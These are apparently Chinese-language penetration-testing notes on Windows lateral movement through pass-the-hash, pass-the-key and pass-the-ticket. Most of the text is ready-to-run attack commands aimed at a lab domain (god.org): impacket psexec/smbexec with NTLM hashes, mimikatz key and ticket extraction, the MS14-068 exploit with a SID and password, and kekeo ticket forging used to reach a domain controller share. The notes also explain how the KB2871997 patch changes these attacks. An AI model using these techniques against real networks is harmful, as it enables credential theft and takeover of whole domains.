横向移动ptt-ptk-pth

PTH

PTH在内网渗透中是一种很经典的攻击方式，原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务，而不用提供明文密码。
如果禁用了ntlm认证，PsExec无法利用获得的ntlm hash进行远程连接，但是使用mimikatz还是可以攻击成功。对于8.1/2012r2，安装补丁kb2871997的Win 7/2008r2/8/2012等，可以使用AES keys代替NT hash来实现ptk攻击,
总结：KB2871997补丁后的影响
pth：没打补丁用户都可以连接，打了补丁只能administrator连接
ptk：打了补丁才能用户都可以连接，采用aes256连接

PTH = Pass The Hash，通过密码散列值 (通常是NTLM Hash)来进行攻击。
在域环境中，用户登录计算机时使用的域账号，计算机会用相同本地管理员账号和密码。因此，如果计算机的本地管理员账号和密码也是相同的，攻击者就可以使用哈希传递的方法登录到内网主机的其他计算机。另外注意在Window Server 2012 R2之前使用到的密码散列值是LM、NTLM，在2012 R2及其版本之后使用到的密码散列值是NTLM Hash。

impacket

psexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

smbexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

PTK

PTK = Pass The Key，当系统安装了KB2871997补丁且禁用了NTLM的时候，
那我们抓取到的ntlm hash也就失去了作用，但是可以通过PTK的攻击方式获得权限。
mimikatz sekurlsa::ekeys
mimikatz sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值

https://www.freebuf.com/column/220740.html

PTT

1、漏洞-MS14068(webadmin权限)-利用漏洞生成的用户的新身份票据尝试认证
MS14-068是密钥分发中心（KDC）服务中的Windows漏洞。
它允许经过身份验证的用户在其Kerberos票证（TGT）中插入任意PAC。
该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。
用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证.

获取sid

上传利用工具

shell ms14-068.exe -u webadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!@#45

伪造票据

清除以前的票据

导入票据

mimikatz kerberos::ptc TGT_webadmin@god.org.ccache

访问域控

kekeo(高权限，需NTLM)

利用获取的NTLM生成新的票据尝试认证

因为当前主机肯定之前与其他主机连接过，所以本地应该生成了一些票据，
我们可以导出这些票据，然后再导入票据，利用。该方法类似于cookie欺骗

生成票据

shell kekeo "tgt::ask /user:Administrator /domain:god.org /ntlm:ccef208c6485269c20db2cad21734fe7" "exit"

导入票据：
shell kekeo "kerberos::ptt TGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi" "exit"

查看票据：
shell klist

利用票据连接：
shell dir \\owa2010cn-god\c$

mimikatz

利用历史遗留的票据重新认证尝试

导出票据：
mimikatz sekurlsa::tickets /export

导入票据：
mimikatz kerberos::ptt C:\Users\webadmin\Desktop\[0;22d3a]-2-1-40e00000-Administrator@krbtgt-god.org.kirbi

查看票据：shell klist
利用票据连接：shell dir \owa2010cn-god\c$
注意：成功不成功看当前主机有没有被目标连接过